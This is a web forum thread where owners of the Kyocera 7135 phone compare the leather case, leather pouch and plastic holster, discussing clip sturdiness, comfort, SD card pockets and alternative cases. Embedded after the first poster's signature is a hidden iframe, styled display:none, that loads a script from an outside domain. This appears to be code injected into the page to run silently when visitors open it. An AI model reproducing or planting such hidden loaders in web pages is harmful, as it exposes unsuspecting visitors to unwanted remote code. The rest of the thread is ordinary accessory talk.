+ Reply to Thread
Page 1 of 4 1 2 3 4 LastLast

Black Case vs Pouch vs Holster

I am trying to make a decision on whether or not to get Kyocera's 7135's black case. I love the holster because the swivel is very sturdy but I'm worried about scratching up the outside of the phone.

I have seen a very bad picture of the Black Case but I can't detrermine if the swivel clip is as sturdy as the holster or if you could use the black case with the holster.

I have seen a picture of the pouch but again I can't tell about the clip.

Can someopne put up pictures or comment about how the case feels? I'm aware that you can't sync the phone while the case is on the phone which sucks but what are you going to do.

Thanks!
    Artkazi<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I have all 3 of them, and for the past 1.5-2 months I have preferred the leather case. The swivel clip is not integrated with the case, but I've never felt like it was going to go anywhere (and, no, you can't use the case and the holster at the same time). The leather pouch uses the same exact clip as the leather case. Last night I decided it was time to give the leather pouch another shot at the starting lineup, and used it all of today... and I might go back to the pouch as my primary holder. The holster has sat on the bench pretty much the entire time I've had the 7135... don't ask me why. I just feel safer with the case and the pouch (and both of them have a little pocket for a SD card... and my second one will be here in a couple days ).
    Please visit my picture site: Robert-O-Rama :)

I've had a leather case since January and I've never used it! I was just satisfied with the plastic holster and never got around to trying the leather case. But now you've convinced me to give it a whirl. The only thing I don't like about the plastic holster is that sometimes it pokes me in the side. I know you can swivel it sideways but that's not the part that's poking me - its the clip.

I've been holding out for Dan to offer the pouch. I know, I can spend almost $650 to early adopt a phone and I'm waiting on a price break on the pouch -- no logic to that.
    iPhone 4S BB8830/Treo700wx/Treo700w/ XV6600/Treo600/Kyo7135

Originally posted by Beryl
    I've been holding out for Dan to offer the pouch. I know, I can spend almost $650 to early adopt a phone and I'm waiting on a price break on the pouch -- no logic to that.
    Have you e-mailed Dan to see when he may have the leather pouch? If he sells them for around the same price as the leather case I'll probably get a spare (just in case my current one is involved in a tragic "scuffing" accident :p ).

Yeah, he says that it is coming. No definite date yet. Maybe a Coach or Dooney & Bourke pouch will come out in the meanwhile.
    iPhone 4S BB8830/Treo700wx/Treo700w/ XV6600/Treo600/Kyo7135

Originally posted by Beryl
    Maybe a Coach or Dooney & Bourke pouch will come out in the meanwhile.
    Yes, that would be awesome! :clap

haha, i'm just joking! :p

* posted from my 7135

I use the leather pouch and like it very much. The clip is too tall so it does stab me in the side when I sit or bend. I guess I could get rid of the love handles and it wouldn't be so bad.

I bought mine directly from Kyo which is a good thing since after about a month, the swivel started to tear out of the leather by the stitching. They sent me a new one and I sent the bad one back. No problem. And no problem with the new one.

Is Dan's an official distributor? The warranty requires it.
    Taylor Made Web Sites and Domain Services
    Happy Kyocera 7135 User 2003-2008. Now Treo 800w.

jeh
    It seems to me that the belt clips on both the leather case and the leather couch seem to me to hold the phone too far away from the belt. As a result it seems pretty "wobbly." The latch seems secure enough, but I'd like it if the phone was held closer to my bod.

The ultimate stop looking.... get your tail to staples.... and buy this case....period

http://www.handspring.com/products/P...002&cat=230003

http://www.staples.com/Catalog/Brows...&Sku=IM1452576

$25

Marc

Fully Converged
    I have both the case and the holster and prefer the holster for everyday knocking around. The case is very nice and classy lookinig and feels good on the ear when using the phone. Although the belt clip, as mentioned above, does stick it out a bit as did the case on the old 6035..... The case is better in a golf cart, though, and protects the phone in the beverage holders!
    From the Middle of the Sea ;-)

Originally posted by mjaffe
    The ultimate stop looking.... get your tail to staples.... and buy this case....period

http://www.handspring.com/products/P...002&cat=230003

http://www.staples.com/Catalog/Brows...&Sku=IM1452576

$25

Marc
    Fossil makes something *very* close to this that I use every day. It's no longer on the Fossil website (that I can find), so the last time I was at the Fossil store, I bought all the black cases they had, and one day-glo yellow case. Now I'll never run out!

Does anybody know if Ripoffs has come out with a case yet? I had one for my 6025 and it worked nice.

John

Originally posted by mjaffe
    Now why in the world would I want a Handspring logo my Kyocera 7135 case? (and I'll make an educated guess that it does NOT have a pocket for SD cards :p ).

Originally posted by Robert K.
    Now why in the world would I want a Handspring logo my Kyocera 7135 case? (and I'll make an educated guess that it does NOT have a pocket for SD cards :p ).
    I got past that. Nothing a black marker will not fix... yes, there is a pocket on the back...awsome case
    Marc

PS... I just found a perfect use to the back pocket...it hold my extra battery....

For those who are getting stabbed in the side by the clip, try turning the clip upside down! It has a hooked end, and will stay put on a belt just fine. I used it all this week like that and find is so much more comfortable.

As a side note, I grazed a door with the phone yesterday, and it popped out of the holster!! It survived the fall just fine, but now Im just carrying it in my pocket...which is a bit bulky. I think I may look at the pouch and see how that works....
    "Why all the pearls, why the blue hair, why anything!?"

Question for all you pouch lovers out there! How is the top cover held to to phone, by velcro or snap?

If the swivel on the clip get turned to the side or upside down is there a fear of the phone falling out? Part of the reason I like the holster is that the phone can be in almost any position and it feels secure.

I'm very surprisd by Azzy's comment of it falling out! Was is a violent collision witht the holtser? Also is the caller ID visible from the top of the case?

My hope is that EB Cases comes out with a good design. You can post your dream design of a case on their website: ebcases.com

As far as the Handspring case: It looks like a mesh case and there isn't a clip on the back so you have to thread your belt through a loop it seems? I'm not sure I like that. I would like a more stylyish leather case myself.

The pouch uses velcro. The phone is not going anywhere when it's inside the pouch! And if the pouch somehow gets from from the belt clip the leather is very thick and the 7135 would be pretty well protected. And the inside is a nice soft suade with a pocket for an SD card

I wonder if EB is going to make a case for us.

That's good to know Robert!

BTW - Can you see the caller ID from the top of the pouch?